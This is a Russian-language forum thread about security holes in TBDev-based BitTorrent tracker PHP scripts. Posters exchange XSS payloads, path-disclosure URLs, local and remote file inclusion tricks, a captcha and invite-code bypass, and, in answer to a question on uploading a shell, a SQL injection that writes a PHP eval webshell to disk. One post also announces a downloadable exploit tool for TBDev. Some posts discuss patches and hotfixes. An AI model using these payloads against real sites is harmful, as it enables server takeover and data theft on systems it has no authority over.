![]() |
Цитата:
З.Ы. В качестве хотфикса конечно покатит, но разработчику я бы посоветовал разобраться с каждым передаваемым параметром основательно. |
Цитата:
Во 2х: я говорил и повторюсь работать не будет только с подобным спец. символами, т.к. при запросах к бд, в бд будет " а слаться на выборку будет "e; естественно совпадений не будет, на это я и оставил 5% не удобности данного метода. ЗЫ: уже 1.5 года в эксплуатации данный метод, хоть бы кто-то пожаловался что их не устраивает. ЗЫЫ: юна учи хтмл и пхп, чтоб не делать таких ошибок в скриптах, а лучше пиши свои и не юзай чужие. |
Цитата:
PHP код:
Код:
http://localhost/1.php.zzz?a=1%20onMouseOver=alert(/aaa/) |
Цитата:
пример: PHP код:
Код:
<table name=1 onMouseOver=alert(/aaa/)><tr><td>test</td></tr></table>Код:
<table name="1 onMouseOver=alert(/aaa/)"><tr><td>test</td></tr></table> |
Kpeamop, я и написал что как хот-фикс он подойдёт, для конкретно этого файла. Но если в нём что нибудь поменяют, этот код может перестать защищать. И само собой, в общем случае, на такой код полагаться нельзя.
З.Ы. К слову, в TBDev мест где в тегах не используются кавычки - *опой жуй. |
Цитата:
|
Цитата:
Цитата:
не эффективно два - у тебя хрень такая - name="something[]" и так несколько чекбоксов - на выходе этого МАССИВА НЕ БУДЕТ |
2 Yuna, *scratch* ты это, с кем говорил?
|
Цитата:
|
что давно не работает? вы хоть понимаете зачем нужна такая конструкция? или смысл моего поста
|
Ребят, хватит юну мучать, он прекрасно знает, где и какие дырки.
Давайте меня помучайте: http://dev.kinokpk.com/releases/Kinokpk.com_releaser_v.2.70.7z |
Цитата:
Тут выкладывают то что сами нашли. |
КЫСС (XSS)
PHP код:
|
что можно сделать если есть доступ к директорскому аку но нету доступа к админке (к блокам) как можно шелл залить?
|
Если у юзера в mysql есть права на запись,то в регистрации например вместо email вписываешь
Код:
'+union+select+'<? eval($a); ?>'+into+otfile+'C:/blablabla/1.php'/*Вместо blablabla пишешь путь который тебе нужен,взять можно из ошибки. Например Цитата:
У меня было один раз что "+" не катил,заменял на /**/.Так же если комментарий "/*" не катит,заменяй на -- или # |
Цитата:
ZonD80, а ты че? :) делай тему =))) может я еще не все знаю? :) |
тема тухнет ,вроде небыло этого раскрытия путей )))
http://127.0.0.1/treker/log.php?type[]= http://127.0.0.1/treker/friends.php?action=delete&type[]=&targetid=2 http://127.0.0.1/treker/browse.php?search[]=&incldead=0&cat=0 какие баян напишите плиз =) а то все 21 страниц заново смареть лень :confused: |
Цитата:
Вот эта и на Kinokpk.com releaser PHP код:
|
раскрытие путей
/testip.php?ip=> |
С форумом простились, аминь!
Мелкие пакости правки, и прочее прочее прочее: 1. Переведены языковые файлики на ArrayAccess. 2. Блокировка скрипта если включен regsiter_globals или не забитыми всяким хламом переменными 3. Привязка кукисов к подсети 255.255.0.0 4. Еще всякие мелочки, кому надо - diff в помощь http://bit-torrent.kiev.ua/downloads.php?do=file&id=25 |
Собственно,понятия не имею было,или небыло,но когда рылся в коде дивжка,для самообразования,нашол:
PHP код:
|
И еще,незнаю будет ли работать гдето еще,ибо нет желания тестировать,но трекеры в моей локальной сети точно подвержены:
PHP код:
PHP код:
PHP код:
|
Извиняюсь что в несколько постов,просто в данный момент пишу с нетбука,который очень меня напрягает.
Все знают,про такую кнопку как "Спасибо",так вот,сабмитим ее,и имеем POST-данные вида: PHP код:
PHP код:
|
Цитата:
а ошибка ибо уникальные индексы |
Цитата:
|
Ну лан спалю одын приват =) на те старые версии
куча LFI & RFI =) мб и не приват к примеру файл recover.php PHP код:
PHP код:
При REGISTER_globals = on и MQ= off http://127.0.0.1/treker/recover.php?rootpath='%00 Warning: require_once(') [function.require-once]: failed to open stream: No such file or directory in C:\xampp\htdocs\treker\include\bittorrent.php on line 57 файлы имеющие такую особенность : faq.php recover.php bookmarks.php rules.php download.php ....по моему почти все =\ Раскрытие путей : так как mysql_real_escape_string PHP код:
Warning: mysql_real_escape_string() expects parameter 1 to be string, array given in C:\xampp\htdocs\treker\include\functions.php on line 462 гуглом поискал не нашел)) еще раскрытие путей PHP код:
|
для меня это как два года боян, два - я указываю что отключайте регистер глобалс, не отключили - их личные проблемы ;)
|
:D Что же подольем немного масла. Слоит v3.3.
На данный момент он умеет обходить:
Совершает атаки через:
Также имеет 2 способа работы:
Добавлено и доработано:
В данный релиз не вошло следующие веши и также были удалены
В связи с тем что форум не захотел отобразить не маленький сплоит. Пришлось его загрузить на отдельный сервер. Взять его можете здесь Если по каким то причинам данный скрипт у вас не запускается, виноваты вы. Он рабочий, проверялся на оригинальном TBDev 2.0. Внимание: Данная программа выложена здесь для ознакомления. Автор не несёт ответственности за негативные последствия, причинённые данной программой в результате правильного или неправильного её использования. Также автор не несет ответственности за причерченный вред кому либо данной программой. ;) Чтож, прикрываем оперативно дырки. |
sendbonus, bonuscode?????? WTF?
Как вы поясните собираетесь обходить $b = get_row_count("captcha", "WHERE imagehash = ".sqlesc($_POST["imagehash"])." AND imagestring = ".sqlesc($_POST["imagestring"]));? Даже если оба 0000000 и 0 - строчек-то тоже 0! |
Цитата:
Хм... ну у нас выходит запрос вида: Код:
SELECT COUNT(*) FROM captcha WHERE imagehash = 'принятый_imagehash' AND imagestring = 0Кстати, бага такого же вида и на инвайтах. Есть ведь супер инвайт в 32 нуля...и работает ведь. |
Цитата:
Цитата:
|
Цитата:
2. Я же говорил, я не вникал как MySQL обрабатывает данный запрос. |
А то что твои "обходники" НЕ РАБОТАЮТ!
|
Цитата:
Только там большинство стоит на Windows и сервером является TopServer. |
Видимо у них или очень старая версия, или что-то еще хуже =))
Два - ты не знал что если открыта рега но включена инвайтная рега - тебя будет просить ввести инвайт но если введеш на него забьет? ;) Так-что проверь еще раз ;) |
Цитата:
|
Цитата:
|
Хотел запустить сплойт на 3 разных пхп - везде одна и таже ошибка:
PHP Fatal error: Call to undefined function dns_get_record() in C:\sql.php on line 448 |
Цитата:
Цитата:
И вообще давай жить дружно ^_^. P.S. Кстати, а форум phpBB 3.0 прикрутить нельзя что ли? |
:) Не поддерживается значит в PHP работа с DNS.
Уважаемый Rostov114 Есть ли другие варианты??? :confused: :confused: :confused: |
| Время: 13:42 |